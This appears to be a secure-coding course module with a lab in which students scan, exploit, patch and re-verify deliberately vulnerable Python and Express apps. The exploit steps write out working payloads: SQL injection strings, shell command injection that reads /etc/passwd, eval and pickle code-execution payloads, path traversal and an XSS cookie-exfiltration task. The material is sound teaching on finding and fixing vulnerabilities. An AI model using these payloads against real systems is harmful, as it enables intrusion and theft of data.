Source Code Vulnerability Management

Objectives: By the end of this topic, you will be able to…

Detect common vulnerabilities in real source code

Use static analysis tools to automate code review

Apply critical thinking to interpret and validate findings

Exploit confirmed vulnerabilities to demonstrate their real-world impact

Propose secure improvements to the code and verify they eliminate the attack vector

What is a vulnerability in code?

A source code vulnerability is a weakness in the logic or implementation of software that can be exploited to compromise its confidentiality, integrity, or availability. These flaws may allow an attacker to execute malicious code, access sensitive information, or alter the system’s behavior.

Main causes of vulnerabilities

Logical errors occur when the program’s logic does not account for all scenarios — for example, checking that a user is authenticated but not verifying their role before performing a sensitive action. These flaws require careful reading of intent and are often missed by automated tools.
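The missing role check described above can be sketched as follows. This is only an illustration: the `User` class, the `"admin"` role name, and both functions are hypothetical and are not taken from the lab code.

```python
from dataclasses import dataclass


@dataclass
class User:
    name: str
    role: str            # hypothetical roles: "admin" or "member"
    authenticated: bool


def delete_account_flawed(requester: User, target: str) -> str:
    # Logic error: only authentication is checked, so any logged-in user passes.
    if not requester.authenticated:
        raise PermissionError("Login required")
    return f"{target} deleted by {requester.name}"


def delete_account_checked(requester: User, target: str) -> str:
    # Authentication first, then the role required for this sensitive action.
    if not requester.authenticated:
        raise PermissionError("Login required")
    if requester.role != "admin":
        raise PermissionError("Admin role required")
    return f"{target} deleted by {requester.name}"
```

Both functions are syntactically valid and pass a linter, which is why a flaw of this kind usually has to be found by reading the code against its intended behavior.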

Lack of input validation allows uncontrolled user data to reach critical functions, causing injections, logic failures, or leaks. The most common example is constructing SQL queries by concatenating strings:

# Vulnerable: attacker supplies username = "' OR '1'='1" to dump the whole table
query = "SELECT * FROM users WHERE username = '" + username + "'"
cursor.execute(query)
 
# Safe: parameterized query — the database never interprets user input as SQL
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))
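To see the difference between the two forms, the sketch below runs both against an in-memory SQLite database. The table contents are made up for illustration, and the `?` placeholder style is the one used by Python's `sqlite3` module; other drivers may use a different marker.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("alice", "alice@example.com"), ("bob", "bob@example.com")],
)

payload = "' OR '1'='1"

# Concatenation: the payload becomes part of the SQL text, so the WHERE
# clause reads  username = '' OR '1'='1'  and matches every row.
unsafe_sql = "SELECT * FROM users WHERE username = '" + payload + "'"
leaked = conn.execute(unsafe_sql).fetchall()

# Placeholder: the payload is bound as a plain string value, and no user
# is literally named "' OR '1'='1".
safe = conn.execute(
    "SELECT * FROM users WHERE username = ?", (payload,)
).fetchall()

print(len(leaked), len(safe))  # prints: 2 0
```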

Use of insecure functions introduces risk because some standard library functions perform no bounds checking. The classic case in C is strcpy, which writes until it hits a null byte regardless of the destination buffer size:

/* Vulnerable: overwrites adjacent memory if src is longer than 63 chars */
char dest[64];
strcpy(dest, src);
 
/* Safe: limits the copy to n-1 bytes */
strncpy(dest, src, sizeof(dest) - 1);
dest[sizeof(dest) - 1] = '\0';

Insecure credential management exposes secrets by embedding them directly in source code, where they end up in version control and are visible to anyone with repository access:

# Vulnerable: secret committed to the repository
DB_PASSWORD = "hunter2"
 
# Safe: read from the environment at runtime — never stored in code
import os
DB_PASSWORD = os.environ.get("DB_PASSWORD")
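One caveat with `os.environ.get` is that it returns `None` when the variable is missing, and the program may only fail much later. A possible way to fail early is sketched below; the helper name `require_env` is hypothetical.

```python
import os


def require_env(name: str) -> str:
    """Return the value of an environment variable or stop with a clear error."""
    value = os.environ.get(name)
    if not value:
        # Failing early avoids connecting with an empty or None password.
        raise RuntimeError(f"Required environment variable {name} is not set")
    return value
```

With this helper, `DB_PASSWORD = require_env("DB_PASSWORD")` either yields a non-empty string or stops the program at startup.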

Access control errors arise when code confuses authentication (confirming who the user is) with authorization (confirming what they are allowed to do). A common mistake is fetching a resource by a user-supplied ID without checking that the requester owns it:

# Vulnerable: any logged-in user can read any record by guessing its ID
def get_record(user_id, record_id):
    return db.query("SELECT * FROM records WHERE id = ?", (record_id,))
 
# Safe: verify ownership before returning data
def get_record(user_id, record_id):
    record = db.query("SELECT * FROM records WHERE id = ?", (record_id,))
    # Treat "not found" and "not yours" alike so record IDs cannot be enumerated
    if record is None or record.owner_id != user_id:
        raise PermissionError("Access denied")
    return record

Relevant OWASP Top 10 categories

The OWASP Top 10 lists the most critical web application security risks. The categories below follow the 2021 edition's numbering and are the ones most closely tied to source code:

Category	Description	Example
A01 — Broken Access Control	Unauthorized access to functions or data	IDOR (Insecure Direct Object Reference)
A03 — Injection	SQL, OS command, or other injection	Inadequate input validation
A07 — Auth Failures	Authentication or session management failures	Token reuse, weak passwords
A08 — Integrity Failures	Using compromised dependencies without verification	Libraries without hash checks
A09 — Logging Failures	Not logging relevant events	Ongoing attacks undetected
A10 — SSRF	User-controlled destination in outbound requests	Internal network scanning

Static vs dynamic analysis

SAST (Static Application Security Testing)

SAST is performed without executing the program — it examines source or binary code directly, looking for risky patterns such as injections, information leaks, input validation errors, and insecure functions. Its main advantage is that it integrates naturally into CI/CD pipelines, catching flaws early when remediation is cheap. Its limitation is that it can generate false positives and cannot verify behavior that only emerges at runtime.
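To make "looking for risky patterns" concrete, here is a minimal sketch of a pattern check over Python's syntax tree. It is not how Bandit or Semgrep are implemented; the `RISKY_CALLS` set and the `find_risky_calls` function are hypothetical names, and real tools ship far larger rule sets.

```python
import ast

RISKY_CALLS = {"eval", "exec"}  # illustrative list, far smaller than a real rule set


def find_risky_calls(source: str) -> list[tuple[int, str]]:
    """Return (line number, function name) for each direct call to a risky builtin."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id in RISKY_CALLS
        ):
            findings.append((node.lineno, node.func.id))
    return sorted(findings)


sample = "x = input()\nprint(eval(x))\n# eval('in a comment') is ignored\n"
print(find_risky_calls(sample))  # prints: [(2, 'eval')]
```

The check flags the call without knowing whether `x` is attacker-controlled, which is one reason static findings can be false positives and need manual validation.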

Dynamic analysis (DAST or IAST)

Dynamic analysis runs the application and observes its actual behavior — making it useful for detecting vulnerabilities that only manifest at runtime, such as race conditions or logic flaws that depend on application state. It complements static analysis rather than replacing it.

SAST tools

Tool	Language	Description
`Bandit`	Python	Reviews code for insecure practices
`Semgrep`	Multi-language	Lightweight, customizable pattern detection
`Flawfinder`	C/C++	Classic tool for insecure function detection
`SonarQube`	Multi-language	Supports custom rules, quality + security
`CodeQL`	Multi-language	Complex pattern queries on code (GitHub)
`Brakeman`	Ruby on Rails	Analysis for Rails applications
`ESLint + Security Plugins`	JavaScript/TypeScript	Security-focused linting

These tools are often integrated into CI/CD pipelines to automatically scan code on each commit or pull request.

Interpreting and validating findings

Not all findings represent a real risk: the first step is to prioritize by severity and context, evaluating whether the vulnerable code is actually reachable by untrusted input. Next, assess reproducibility — can the finding be exploited, and under what conditions? Tracing the data flow from input to the vulnerable function helps confirm whether validation is truly absent. When a genuine flaw is confirmed, apply secure coding principles to fix it without breaking surrounding logic. Finally, document every finding thoroughly so it can be reviewed, corrected, and used as a learning reference by the team.

Hands-on lab

Requirements: Kali Linux, bandit, semgrep, Node.js

Part 0: Setting up the lab

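# Install pipx and make its bin directory available on PATH
sudo apt update && sudo apt install -y pipx
pipx ensurepath
 
# Install scanner tools (one package per command works on every pipx version)
pipx install bandit
pipx install semgrep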

Create a Semgrep account at semgrep.dev using your GitHub account.

Part 1: Python CLI tool

You are given insecure_script.py, a small Python backend utility. Your workflow for this part is: scan → exploit → patch → verify.

Step 1 — Scan. Run Bandit and save the full report:

bandit -r insecure_script.py 2>&1 | tee bandit_before.txt

For every HIGH and MEDIUM severity finding, record the line number, the Bandit rule ID, and what you think the risk is — before reading the code in depth.
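If you prefer to build that list from a machine-readable report, Bandit can also write JSON (`-f json`). The sketch below assumes the report has a top-level `results` list whose entries carry `issue_severity`, `line_number`, `test_id`, and `issue_text`. The `triage` function is a hypothetical helper, and the sample entries are illustrative placeholders, not output from insecure_script.py.

```python
import json

SEVERITY_ORDER = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}


def triage(report: dict) -> list[dict]:
    """Keep HIGH and MEDIUM findings, most severe first, then by line number."""
    wanted = [
        r for r in report.get("results", [])
        if r.get("issue_severity") in ("HIGH", "MEDIUM")
    ]
    return sorted(
        wanted,
        key=lambda r: (SEVERITY_ORDER[r["issue_severity"]], r["line_number"]),
    )


# Illustrative entries only, shaped like Bandit's JSON results.
sample_report = json.loads("""
{"results": [
  {"issue_severity": "LOW",    "line_number": 3,  "test_id": "B404", "issue_text": "example"},
  {"issue_severity": "MEDIUM", "line_number": 40, "test_id": "B301", "issue_text": "example"},
  {"issue_severity": "HIGH",   "line_number": 22, "test_id": "B602", "issue_text": "example"}
]}
""")

for finding in triage(sample_report):
    print(finding["issue_severity"], finding["line_number"], finding["test_id"])
```

To use it on a real scan, write the report with `bandit -r insecure_script.py -f json -o bandit_before.json` (the output file name is an assumption) and pass the result of `json.load` to `triage`.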

Step 2 — Exploit. Run the script and work through each prompt. Do not change any code yet. Your goal is to confirm which findings represent real, triggerable vulnerabilities.

python3 insecure_script.py

User lookup — SQL injection: At the username prompt, enter ' OR '1'='1' --. Count the records returned and compare them to what a legitimate user should see. What did the injected condition do to the WHERE clause?

Network ping — command injection: Enter 127.0.0.1; whoami at the host prompt. The semicolon ends the ping command and starts a new shell command. Then try 127.0.0.1; cat /etc/passwd to read a system file. Screenshot the output.
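The reason the semicolon works is that a shell parses the whole string. The sketch below shows, under simplifying assumptions, what changes when arguments are passed as a list: a child Python process stands in for `ping` so the example runs anywhere, and `validated_host` and `run_with_argument` are hypothetical helper names.

```python
import ipaddress
import subprocess
import sys


def validated_host(raw: str) -> str:
    """Accept only a literal IPv4/IPv6 address; anything else raises ValueError."""
    return str(ipaddress.ip_address(raw.strip()))


def run_with_argument(arg: str) -> str:
    # Stand-in for ping: a child Python process that echoes its first argument.
    # Passing a list (no shell=True) means no shell ever parses `arg`.
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", arg],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.strip()


payload = "127.0.0.1; whoami"
print(run_with_argument(payload))   # the semicolon arrives as ordinary text
```

Validating the value as well, as `validated_host` does, also blocks inputs that begin with `-` and would otherwise be read as options. The trade-off in this sketch is that hostnames are rejected and only literal addresses pass.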

Calculator — arbitrary code execution via eval: Enter __import__('os').system('id'). The function receives your input as a string and executes it as Python code. Record what the output reveals about the process running the script.
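For contrast, the sketch below feeds the same payload to `ast.literal_eval`, which parses Python literals but refuses function calls. The wrapper name `parse_literal` is hypothetical.

```python
import ast

payload = "__import__('os').system('id')"


def parse_literal(text: str):
    """Parse a Python literal (number, string, list, ...) without running code."""
    try:
        return ast.literal_eval(text)
    except (ValueError, SyntaxError) as exc:
        raise ValueError(f"Rejected input: {text!r}") from exc


print(parse_literal("[1, 2, 3]"))
try:
    parse_literal(payload)
except ValueError as exc:
    print(exc)
```

Note that `ast.literal_eval` also rejects arithmetic such as `2 * 3`, so it is a safe parser for literals rather than a drop-in calculator.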

Session loader — pickle deserialization RCE: Pickle can encode arbitrary Python objects, including ones that run a system command when deserialized. In a separate terminal, generate a malicious payload:

python3 -c "
import pickle, os, base64
 
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('id',))
 
print(base64.b64encode(pickle.dumps(Exploit())).decode())
"

Paste the output at the session loader prompt and observe the command execute before load_session returns.
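The mechanism behind this exploit can be observed safely by swapping `os.system` for a harmless callable. In the sketch below, `Probe` is a hypothetical class and `os.getcwd` is a deliberately benign stand-in; the point is only that the unpickler calls whatever `__reduce__` names.

```python
import json
import os
import pickle


class Probe:
    # __reduce__ tells pickle how to rebuild the object: "call this callable
    # with these arguments". The unpickler performs that call on load.
    def __reduce__(self):
        return (os.getcwd, ())   # harmless stand-in for os.system


blob = pickle.dumps(Probe())
result = pickle.loads(blob)      # calls os.getcwd() instead of building a Probe
print(type(result).__name__)     # prints: str

# JSON only describes data (objects, arrays, strings, numbers), so loading it
# cannot trigger a call chosen by the sender.
session = json.loads('{"user": "alice", "role": "member"}')
print(session["role"])           # prints: member
```

Data loaded from JSON still has to be validated (for example, that `role` holds an expected value), but parsing it does not execute anything.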

One-time tokens — insecure randomness: The script prints five tokens generated by random.randint. Note the approximate time. Then run the following to reproduce the same sequence:

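python3 -c "
import random, time
now = int(time.time())
# Try each second in the last minute as the seed; look for the row that matches
for seed in range(now - 60, now + 1):
    random.seed(seed)
    print(seed, [random.randint(100000, 999999) for _ in range(5)])
"

This attack assumes the script seeds random with int(time.time()); by default Python seeds the module from operating-system entropy, not the clock. With a time-based seed, an attacker who knows roughly when the tokens were generated can regenerate all of them by trying the few candidate seconds. Even without it, random uses the Mersenne Twister, which is not cryptographically secure: its internal state can be reconstructed from enough observed outputs, so it should never produce security tokens.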
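A replacement based on the standard-library `secrets` module might look like the sketch below. The function names and the six-digit format are assumptions made to mirror the tokens printed by the script.

```python
import secrets


def one_time_code() -> str:
    """Six-digit code drawn from the operating system's CSPRNG."""
    return str(secrets.randbelow(900_000) + 100_000)


def session_token() -> str:
    """128 bits of randomness as 32 hex characters."""
    return secrets.token_hex(16)


print(one_time_code(), session_token())
```

Because `secrets` cannot be seeded, there is no timestamp or state for an attacker to guess.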

Hardcoded credentials — static finding: The remaining Bandit findings flag constants assigned at module level. No runtime interaction is needed — their presence in the source file means they will appear in every git commit, log, and deployment artefact. Document what each credential controls and what an attacker could do with it.

Step 3 — Patch. Fix every HIGH and MEDIUM finding. Use the table below as a guide, then write the secure version yourself:

Vulnerability	Secure pattern
SQL injection	Parameterized queries: `cursor.execute(query, (param,))`
Command injection	Pass arguments as a list, no `shell=True`: `subprocess.check_output(["ping", "-c", "1", host])`
`eval` / `exec`	Remove or replace; use `ast.literal_eval` only for safe literal parsing
Pickle deserialization	Use `json` for untrusted data
Hardcoded credentials	`os.environ.get("VAR_NAME")` — never store secrets in source code
Weak password hash	`bcrypt` or `argon2` for passwords; `hashlib.sha256` for non-secret digests
Insecure random	`secrets.token_hex()` or `secrets.randbelow()` for security-sensitive values

Add a short comment to every line you change explaining what you fixed and why.
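The table recommends `bcrypt` or `argon2`, which are third-party packages. As a standard-library stand-in, the sketch below uses PBKDF2-HMAC-SHA256 to illustrate the same ideas: a per-password random salt, a deliberately slow derivation, and a constant-time comparison. The function names and the iteration count are assumptions, not values from the lab.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed work factor; tune to your hardware


def hash_password(password: str) -> tuple[bytes, bytes]:
    """Return (salt, derived key) using PBKDF2-HMAC-SHA256 with a random salt."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, key


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(key, expected)
```

Store the salt alongside the derived key; a plain `hashlib.sha256(password)` digest has neither a salt nor a work factor, which is what makes it cheap to brute-force.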

Step 4 — Verify. Rerun Bandit — it should report zero HIGH or MEDIUM findings. Then rerun the script and attempt each exploit again. Every attack should now either raise an error or produce no useful output.

bandit -r insecure_script.py 2>&1 | tee bandit_after.txt
python3 insecure_script.py

Question

Which finding was hardest to exploit — and which was hardest to patch correctly? Did exploiting them change the order in which you prioritized the fixes?

Part 2: Node.js web application

You are given a small Express application in nodejs-app/. Your workflow is the same: scan → exploit → patch → verify.

Step 1 — Deploy and scan.

cd nodejs-app
npm install
npm start &    # runs on http://localhost:3000
semgrep --config=auto app.js 2>&1 | tee semgrep_before.txt

For each Semgrep finding, record the line, the rule ID, the affected endpoint, and your hypothesis about how it could be exploited.

Step 2 — Exploit. With the server running, attack every endpoint. Screenshot or save the output of each successful exploit before changing any code.

Hardcoded secrets — static finding: Locate the constants Semgrep flags near the top of app.js. Describe what an attacker who reads the source (or who obtains a leaked build artefact) could do with each value.

Reflected XSS — GET /hello: Open a browser and navigate to:

http://localhost:3000/hello?name=<script>alert(document.cookie)</script>

Observe the script execute. Now craft a payload that exfiltrates the page’s cookies to an external endpoint — use Webhook.site to receive the request and confirm the data arrived.
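The escaping step that defeats this payload is the same in any language. For consistency with Part 1, here is a minimal sketch in Python; app.js would need the equivalent in JavaScript, and the `render_greeting` function is hypothetical.

```python
import html


def render_greeting(name: str) -> str:
    # html.escape converts <, >, &, and quotes into entities, so the browser
    # displays the payload as text instead of parsing it as markup.
    return f"<h1>Hello, {html.escape(name, quote=True)}</h1>"


print(render_greeting("<script>alert(document.cookie)</script>"))
# prints: <h1>Hello, &lt;script&gt;alert(document.cookie)&lt;/script&gt;</h1>
```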

SQL injection — GET /user:

# Return every row in the users table
curl -G --data-urlencode "username=' OR '1'='1" http://localhost:3000/user
 
# Target the admin record specifically
curl -G --data-urlencode "username=admin'--" http://localhost:3000/user

Compare what you receive to what the endpoint is supposed to return for a normal request.

Path traversal — GET /file:

curl -G --data-urlencode "name=../../../../etc/passwd" http://localhost:3000/file
curl -G --data-urlencode "name=../../../../etc/hostname" http://localhost:3000/file

How far outside the intended directory can you navigate? What limits you?
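The usual defence is to resolve the requested path and confirm that it still lies inside the directory being served. The sketch below expresses that check in Python for consistency with Part 1; `BASE_DIR` and `safe_path` are hypothetical, and in app.js the same idea would be built on Node's `path` module.

```python
from pathlib import Path

BASE_DIR = Path("/srv/app/files")   # hypothetical directory the endpoint may serve


def safe_path(name: str) -> Path:
    """Resolve `name` under BASE_DIR and reject anything that escapes it."""
    base = BASE_DIR.resolve()
    candidate = (base / name).resolve()
    # is_relative_to compares whole path components, so /srv/app/files-old
    # is not mistaken for a child of /srv/app/files (Python 3.9+).
    if not candidate.is_relative_to(base):
        raise PermissionError(f"Path escapes {base}: {name!r}")
    return candidate
```

Comparing whole path components matters: a plain string-prefix test would accept a sibling directory whose name merely begins with the allowed directory's name.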

Command injection — GET /ping:

curl -G --data-urlencode "host=127.0.0.1; id" http://localhost:3000/ping
curl -G --data-urlencode "host=127.0.0.1; cat /etc/passwd" http://localhost:3000/ping

IDOR — GET /note:

curl "http://localhost:3000/note?id=1"

No authentication is required. What does this mean for a multi-user application where notes are supposed to be private?

Credentials in URL — GET /login:

curl "http://localhost:3000/login?username=admin&password=admin123"

Switch to the terminal running npm start and find the request in the access log. Explain why GET parameters are a poor choice for credentials even when HTTPS is in use.

eval RCE — GET /calc:

curl -G --data-urlencode "expr=require('child_process').execSync('id').toString()" http://localhost:3000/calc
curl -G --data-urlencode "expr=require('fs').readFileSync('/etc/passwd','utf8')" http://localhost:3000/calc

Missing security headers:

curl -I http://localhost:3000/hello

Note which headers are absent. Look up what each missing header protects against and how the reflected XSS exploit from earlier could be partially mitigated by a correct Content-Security-Policy.

Step 3 — Patch. Fix every finding in app.js:

Vulnerability	Secure pattern
Hardcoded secrets	`process.env.VAR_NAME`; document required variables in a `.env.example` file
Reflected XSS	Escape user input before inserting it into HTML; add a `Content-Security-Policy` header
SQL injection	Parameterized queries using `?` placeholders: `db.get(query, [param], callback)`
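Path traversal	`path.resolve()` the final path and assert it equals the allowed directory or starts with the allowed directory followed by `path.sep` (a bare prefix check would also accept a sibling such as `files-old`)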
Command injection	Use `execFile` with an argument array instead of `exec` with a shell string
IDOR	Require authentication; verify the authenticated user owns the requested resource
Credentials in URL	Accept credentials via POST body only; never read passwords from query parameters
`eval` RCE	Remove the endpoint; if a calculator is needed, use a safe math parser library
Missing headers	Install the package with `npm install helmet`, then register `app.use(require('helmet')())` as the first middleware

Step 4 — Verify. Stop the server, restart with the patched code, and rerun Semgrep:

pkill -f "node app.js"
npm start &
semgrep --config=auto app.js 2>&1 | tee semgrep_after.txt

Rerun every curl command and browser request from Step 2. Each attack must either be rejected with an appropriate error or return sanitized output. Capture a screenshot for each one.

Question

Which vulnerability in the web application had the largest gap between how simple it was to exploit and how much damage it could cause in a real deployment? How did your answer change after you ran the exploit versus when you only read the Semgrep finding?

Cleanup

pkill -f "node app.js"

Submission

Compressed folder including:

bandit_before.txt and bandit_after.txt
semgrep_before.txt and semgrep_after.txt
Terminal output or screenshots for every successful exploit (before patching)
Patched insecure_script.py and app.js with explanatory comments on every changed line
Written reflection (max. 1 page): which vulnerability surprised you most once you exploited it, and why

Key concepts

Term	Definition
SAST	Source code analysis without executing the application
Vulnerability	Exploitable weakness in a system or application
SQLi	Injection of malicious SQL code into input fields
XSS	Injection of malicious scripts into web pages
Bandit	SAST tool for Python code
Semgrep	Multi-language and customizable static analyzer
OWASP Top 10	List of the ten most critical web vulnerabilities
